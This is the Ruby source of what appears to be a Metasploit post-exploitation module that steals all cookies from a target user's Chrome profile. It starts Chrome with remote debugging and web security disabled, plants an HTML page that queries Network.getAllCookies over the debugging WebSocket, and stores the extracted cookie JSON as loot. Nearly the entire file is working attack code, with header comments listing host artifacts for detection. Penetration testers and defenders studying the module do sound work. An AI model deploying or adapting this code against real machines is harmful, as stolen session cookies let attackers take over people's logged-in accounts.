Path: blob/master/modules/post/multi/gather/chrome_cookies.rb
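##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Post module that reads the cookies of the Default Chrome profile through
# Chrome's remote debugging interface.
#
# Flow, as implemented below:
#   1. #configure_for_platform picks the Chrome binary, the user's profile
#      directory and a temp directory, and builds the Chrome command line.
#   2. #create_cookie_stealing_html writes a small HTML page to the temp
#      directory; the page asks the local debugging port for all cookies and
#      logs them to the console behind a `REMOTE_DEBUGGING|` marker.
#   3. #get_cookies starts Chrome, waits, reads the captured output and cuts
#      the JSON out of the marked line.
#   4. #run parses the JSON and stores it as loot; #cleanup removes the files.
#
# Artifacts this leaves on the host (useful when writing detections):
#   * a Chrome process started with `--remote-debugging-port`,
#     `--disable-web-security` and `--user-data-dir` pointing at the user's
#     real profile directory;
#   * a randomly named `.html` file in the temp directory;
#   * on non-Windows sessions, a randomly named output file in the temp
#     directory; on Windows, `chrome_debug.log` inside the profile directory;
#   * on every session except Windows meterpreter, the Chrome process is not
#     killed by the module (see the warning printed in #run).
class MetasploitModule < Msf::Post
  include Msf::Post::File

  # Marker the injected page prepends to the cookie JSON in Chrome's console log.
  COOKIE_MARKER = 'REMOTE_DEBUGGING|'.freeze

  # Registers module metadata and the three user-settable options.
  #
  # @param info [Hash] module info passed through to Msf::Post
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Chrome Gather Cookies',
        'Description' => 'Read all cookies from the Default Chrome profile of the target user.',
        'License' => MSF_LICENSE,
        'Author' => ['mangopdf <mangodotpdf[at]gmail.com>'],
        'Platform' => %w[linux unix bsd osx windows],
        'SessionTypes' => %w[meterpreter shell]
      )
    )

    register_options(
      [
        OptString.new('CHROME_BINARY_PATH', [false, "The path to the user's Chrome binary (leave blank to use the default for the OS)", '']),
        OptString.new('WRITEABLE_DIR', [false, 'Where to write the html used to steal cookies temporarily, and the cookies. Leave blank to use the default for the OS (/tmp or AppData\\Local\\Temp)', '']),
        OptInt.new('REMOTE_DEBUGGING_PORT', [false, 'Port on target machine to use for remote debugging protocol', 9222])
      ]
    )
  end

  # Resolves per-platform paths and builds the Chrome command line.
  #
  # Sets @cookie_storage_path, @html_storage_path and @chrome_debugging_cmd.
  # Fails the module with Failure::NoTarget on an unsupported platform.
  #
  # @return [String] the assembled Chrome command (also kept in @chrome_debugging_cmd)
  def configure_for_platform
    vprint_status('Determining session platform')
    vprint_status("Platform: #{session.platform}")
    vprint_status("Type: #{session.type}")

    username = if session.platform == 'windows'
                 get_env('USERNAME').strip
               else
                 cmd_exec 'id -un'
               end

    # The option is registered as WRITEABLE_DIR. Reading only the misspelt
    # WRITABLE_DIR key meant the registered option was never consulted; the
    # misspelt key is still honoured so existing setups keep working. A blank
    # value counts as "not set" because the registered default is ''.
    temp_storage_dir = [datastore['WRITEABLE_DIR'], datastore['WRITABLE_DIR']]
                       .map { |dir| dir.to_s.strip }
                       .find { |dir| !dir.empty? }

    case session.platform
    when 'unix', 'linux', 'bsd', 'python'
      chrome = 'google-chrome'
      # NOTE(review): assumes the home directory is /home/<user> — confirm for root and custom homes.
      user_data_dir = "/home/#{username}/.config/google-chrome"
      temp_storage_dir ||= '/tmp'
      @cookie_storage_path = "#{temp_storage_dir}/#{Rex::Text.rand_text_alphanumeric(10..15)}"
    when 'osx'
      chrome = '"/Applications/Google Chrome.app/Contents/MacOS/Google Chrome"'
      user_data_dir = expand_path "/Users/#{username}/Library/Application Support/Google/Chrome"
      temp_storage_dir ||= '/tmp'
      @cookie_storage_path = "#{temp_storage_dir}/#{Rex::Text.rand_text_alphanumeric(10..15)}"
    when 'windows'
      chrome = '"\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe"'
      user_data_dir = "\\Users\\#{username}\\AppData\\Local\\Google\\Chrome\\User Data"
      temp_storage_dir ||= "\\Users\\#{username}\\AppData\\Local\\Temp"
      # On Windows the output is read from Chrome's own log file (see --enable-logging below).
      @cookie_storage_path = "#{user_data_dir}\\chrome_debug.log"
    else
      fail_with Failure::NoTarget, "Unsupported platform: #{session.platform}"
    end

    # to_s keeps an unset (nil) option from raising on #empty?.
    chrome_override = datastore['CHROME_BINARY_PATH'].to_s
    chrome = chrome_override unless chrome_override.empty?

    # No writability check is made on temp_storage_dir: the earlier check was
    # disabled because #writable? is not supported on Windows.

    @html_storage_path = create_cookie_stealing_html(temp_storage_dir)

    chrome_debugging_args = []

    if session.platform == 'windows'
      # `--headless` doesn't work on Windows, so use an offscreen window instead.
      chrome_debugging_args << '--window-position=0,0'
      chrome_debugging_args << '--enable-logging --v=1'
    else
      chrome_debugging_args << '--headless'
    end

    chrome_debugging_args_all_platforms = [
      '--disable-translate',
      '--disable-extensions',
      '--disable-background-networking',
      '--safebrowsing-disable-auto-update',
      '--disable-sync',
      '--metrics-recording-only',
      '--disable-default-apps',
      '--mute-audio',
      '--no-first-run',
      # presumably needed so the local page may query the debugging endpoint — confirm
      '--disable-web-security',
      '--disable-plugins',
      '--disable-gpu'
    ]

    # concat keeps the list flat; the joined command string is the same as
    # with the nested array that `<<` produced.
    chrome_debugging_args.concat(chrome_debugging_args_all_platforms)
    chrome_debugging_args << " --user-data-dir=\"#{user_data_dir}\""
    chrome_debugging_args << " --remote-debugging-port=#{datastore['REMOTE_DEBUGGING_PORT']}"
    chrome_debugging_args << " #{@html_storage_path}"

    @chrome_debugging_cmd = "#{chrome} #{chrome_debugging_args.join(' ')}"
  end

  # Writes the helper HTML page to the temp directory.
  #
  # The page requests `/json` from the local debugging port, opens the
  # returned WebSocket debugger URL, sends `Network.getAllCookies` and logs
  # the result to the console prefixed with `REMOTE_DEBUGGING|`.
  #
  # @param temp_storage_dir [String] directory on the session host to write into
  # @return [String] path of the written HTML file
  def create_cookie_stealing_html(temp_storage_dir)
    cookie_stealing_html = %(
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>index.html</title>
</head>
<body>
<script>

var remoteDebuggingPort = #{datastore['REMOTE_DEBUGGING_PORT']};
var request = new XMLHttpRequest();
request.open("GET", "http://localhost:" + remoteDebuggingPort + "/json");
request.responseType = 'json';
request.send();

request.onload = function() {
var webSocketDebuggerUrl = request.response[0].webSocketDebuggerUrl;
console.log(webSocketDebuggerUrl);
var connection = new WebSocket(webSocketDebuggerUrl);

connection.onopen = function () {
connection.send('{"id": 1, "method": "Network.getAllCookies"}');
};

connection.onmessage = function (e) {
var cookies_blob = JSON.stringify(JSON.parse(e.data).result.cookies);
console.log('REMOTE_DEBUGGING|' + cookies_blob);
};
}
</script>
</body>
</html>
)

    # Where to temporarily store the cookie-stealing html
    separator = session.platform == 'windows' ? '\\' : '/'
    html_storage_path = "#{temp_storage_dir}#{separator}#{Rex::Text.rand_text_alphanumeric(10..15)}.html"

    write_file(html_storage_path, cookie_stealing_html)
    html_storage_path
  end

  # Removes the HTML page and the captured-output file from the host.
  #
  # Either path may still be nil when the module failed before
  # #configure_for_platform assigned it, so nil paths are skipped.
  def cleanup
    [@html_storage_path, @cookie_storage_path].each do |path|
      next if path.nil? || !file?(path)

      vprint_status("Removing file #{path}")
      rm_f path
    end
  end

  # Starts Chrome with the prepared command, waits five seconds and extracts
  # the cookie JSON from the captured output.
  #
  # @return [String] the cookie list as a JSON string
  def get_cookies
    if session.platform == 'windows'
      chrome_cmd = @chrome_debugging_cmd.to_s
      kill_cmd = 'taskkill /f /pid'
    else
      # stdout and stderr are redirected so the console output ends up in a file.
      chrome_cmd = "#{@chrome_debugging_cmd} > #{@cookie_storage_path} 2>&1"
      kill_cmd = 'kill -9'
    end

    if session.type == 'meterpreter'
      chrome_pid = cmd_exec_get_pid(chrome_cmd)
      print_status "Activated Chrome's Remote Debugging (pid: #{chrome_pid}) via #{chrome_cmd}"
      Rex.sleep(5)

      # read_file within if/else block because kill was terminating sessions on OSX during testing
      chrome_output = read_file(@cookie_storage_path)

      # Kills spawned chrome process in windows meterpreter sessions.
      # In OSX and Linux the meterpreter sessions would stop as well.
      cmd_exec "#{kill_cmd} #{chrome_pid}" if session.platform == 'windows'
    else
      # Using shell_command for backgrounding process (&)
      client.shell_command("#{chrome_cmd} &")
      print_status "Activated Chrome's Remote Debugging via #{chrome_cmd}"
      Rex.sleep(5)

      chrome_output = read_file(@cookie_storage_path)
    end

    # to_s: a failed read yields no output instead of a NoMethodError on nil.
    # Matching the full marker (with the pipe) guarantees the split below
    # always has a second element. The last matching line wins.
    cookies_msg = ''
    chrome_output.to_s.each_line do |line|
      next unless line.include?(COOKIE_MARKER)

      print_good('Found Match')
      cookies_msg = line
    end

    fail_with(Failure::Unknown, 'Failed to retrieve cookie data') if cookies_msg.empty?

    # Slice off the "REMOTE_DEBUGGING|" delimiter and trailing source info.
    # Limit 2 keeps the JSON whole even if the marker text recurs inside it.
    cookies_json = cookies_msg.split(COOKIE_MARKER, 2)[1].to_s.split('", source: file')[0]
    fail_with(Failure::Unknown, 'Failed to retrieve cookie data') if cookies_json.nil? || cookies_json.empty?

    cookies_json
  end

  # Stores the collected data as loot and prints where it was saved.
  #
  # @param msg [String] description recorded with the loot
  # @param data [String] loot contents
  # @param ctype [String] content type recorded with the loot
  def save(msg, data, ctype = 'text/json')
    ltype = 'chrome.gather.cookies'
    loot = store_loot ltype, ctype, session, data, nil, msg
    print_good "#{msg} stored in #{loot}"
  end

  # Module entry point: validates the session, collects the cookies and
  # stores them as loot.
  def run
    fail_with Failure::BadConfig, 'No session found, giving up' if session.nil?

    # Issues with write_file. Maybe a path problem?
    if session.platform == 'windows' && session.type == 'shell'
      fail_with Failure::BadConfig, 'Windows shell session not supported, giving up'
    end

    unless session.platform == 'windows' && session.type == 'meterpreter'
      print_warning 'This module will leave a headless Chrome process running on the target machine.'
    end

    configure_for_platform
    cookies = get_cookies

    # A truncated or malformed log line is reported as a module failure
    # rather than surfacing as an unhandled parser exception.
    begin
      cookies_parsed = JSON.parse cookies
    rescue JSON::ParserError => e
      fail_with Failure::Unknown, "Could not parse cookie data as JSON: #{e.message}"
    end

    save "#{cookies_parsed.length} Chrome Cookies", cookies
  end
end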